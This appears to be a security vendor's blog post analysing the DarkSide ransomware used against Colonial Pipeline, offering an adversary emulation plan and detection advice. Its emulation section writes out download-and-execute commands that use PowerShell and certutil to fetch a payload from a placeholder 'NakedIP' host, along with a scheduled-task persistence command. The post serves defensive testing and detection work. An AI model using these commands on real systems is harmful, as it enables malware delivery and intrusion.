#ThreatThursday - DarkSide Ransomware

Over Mother’s Day weekend, we heard of the latest ransomware attack that affected Colonial Pipeline, the IT infrastructure of the pipeline that carries 2.5 million barrels a day, roughly 45% of the United States East Coast's supply of diesel, petrol and jet fuel. On Monday, May 10, the FBI confirmed that the attack on Colonial Pipeline is a ransomware known as DarkSide

In this blog we consume Cyber Threat Intelligence to understand how the DarkSide ransomware behaves, we create and share an adversary emulation plan so you can quickly test, measure, and improve your people, process, and technology for similar attacks, and we discuss how to detect and respond to DarkSide ransomware.

Cyber Threat Intelligence

The DarkSide ransomware has been used for 9-10 months per Catalin Cimpanu which gives us a good foundation of Cyber Threat Intelligence (CTI). This adversary emulation plan is based on Cybereason’s intel from April 2021. We see that DarkSide has evolved like Maze, Ryuk and Egregor to perform double extortion. Double extortion is when the threat group steals files from the victim to post on their website in order to pressure victims into paying as well as encrypting all the files and only offering to unlock them after payment is received.

According to DarkTracer: DarkWeb Criminal Intelligence, DarkSide has attacked 3 other Oil and Gas companies since November 2020.

From the CTI, there are a few things that stick out that we should test our organization’s for:

  • Command and Control was observed as HTTP (clear text) instead of HTTPS
  • Downloading the malware was directly to a “naked IP” not a domain name as most people would use to navigate to a website
  • PowerShell.exe and Certutil for downloading and executing the ransomware
  • Scheduled Tasks
  • Checking the operating system language before performing ransomware TTPs

Adversary Emulation Plan

As usual, we have shared the adversary emulation plan with the community through our GitHub. There is a little bit of setup as this threat actor leverages poor operational security such as direct IP address access and HTTP.

HTTP for C2

Ensure you have the HTTP relay installed on your SCYTHE server or on a different host and redirecting to your SCYTHE server. Create a new SCYTHE campaign as you would normally do but select HTTP as the communication method. Ensure the parameters are correct for your relay configuration. The Cyber Threat Intelligence shows that “naked IPs” were used so you may want to set the parameters to an IP address instead of a domain name.

In the automation steps screen, import from existing threats: DarkSide. Here are a few steps from the plan we want to call out:

  • The DarkSide ransomware checks the operating system language before executing the ransomware. In Step 2 of the plan, we do the same checking for the English language: reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Nls\Language
  • Step 3 then decides if to continue to execute or not based on the language
  • Step 9 creates a new Scheduled Task named how the Cyber Threat Intelligence informed us: SCHTASKS /CREATE /SC DAILY /TN "MyTasks\Task1" /TR "C:\update.exe" /ST 11:00 /F
  • Step 17 performs data staging and step 18 does exfiltration through the C2 channel
  • Step 19 then encrypts the data and erases the original
  • Step 22 decides if your payload is running with local administrator privileges to then execute powershell Get-WmiObject Win32_Shadowcopy
  • Step 25 and 26 clean up to leave the system how we found it.

Execution

According to the Cyber Threat Intelligence, the threat actor leveraged PowerShell.exe and CertUtil.exe to download and then execute the ransomware. 

  • powershell -Command "(New-Object Net.WebClient).DownloadFile('http://NakedIP/payload.exe','C:\Users\Public\update.exe')"
  • Certutil.exe -urlcache -split -f http://NakedIP/payload.exe C:\Temp\update.exe

SCYTHE server will always push you to HTTPS as a method of operational security. However, we can still test by going to a direct IP address:

  • C:\Users\LocalUser>powershell
  • PS C:\Users\LocalUser> [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
  • PS C:\Users\LocalUser> (New-Object Net.WebClient).DownloadFile('http://NakedIP/ServiceLogin?active=u1X899QnyUKGQ_BK409U7A&b=true','C:\Users\Public\update.exe')
  • PS C:\Users\LocalUser>C:\Users\Public\update.exe

Detect and Respond to DarkSide Ransomware

In an attempt to not sound like a broken record, we will focus on what makes this ransomware different to detect and respond to. As usual, making daily backups and restoring will get you back and running as quickly as possible when the inevitable happens. However, you can detect and respond much earlier by building detection for these TTPs:

  • Detect and alert when the registry key is queried for the default language of the operating system, this is an early indicator.
  • Detect and alert when powershell.exe and certutil.exe goes out to the  Internet to retrieve any file.
  • Detect and alert on any outbound connections to a “naked IP” address. Humans generally do not type these out. I have seen companies completely prevent this access with their web proxies.
  • Alert when a new scheduled task is created. 

Conclusion

We can no longer ignore ransomware as an annoying attack that affects everyone but us. No company is immune to these attacks and therefore needs to be prepared. In this post we leveraged Cyber Threat Intelligence from Cybereason to understand how this adversary behaves, we created and shared an adversary emulation plan so you can quickly test, measure, and improve your people, process, and technology against similar attacks, and we discuss how to detect and respond to DarkSide ransomware.

This Threat Thursday post discusses active research by SCYTHE and other cited third parties into an ongoing threat. The information in this post should be considered preliminary and may be updated as research continues. This information is provided “as-is” without any warranty or condition of any kind, either express or implied.

About SCYTHE

SCYTHE provides an advanced attack emulation platform for the enterprise and cybersecurity consulting market. The SCYTHE platform enables Red, Blue, and Purple teams to build and emulate real-world adversarial campaigns in a matter of minutes. Customers are in turn enabled to validate the risk posture and exposure of their business and employees and the performance of enterprise security teams and existing security solutions. Based in Arlington, VA, the company is privately held and is funded by Gula Tech Adventures, Paladin Capital, Evolution Equity, and private industry investors. For more information email info@scythe.io, or follow on Twitter @scythe_io.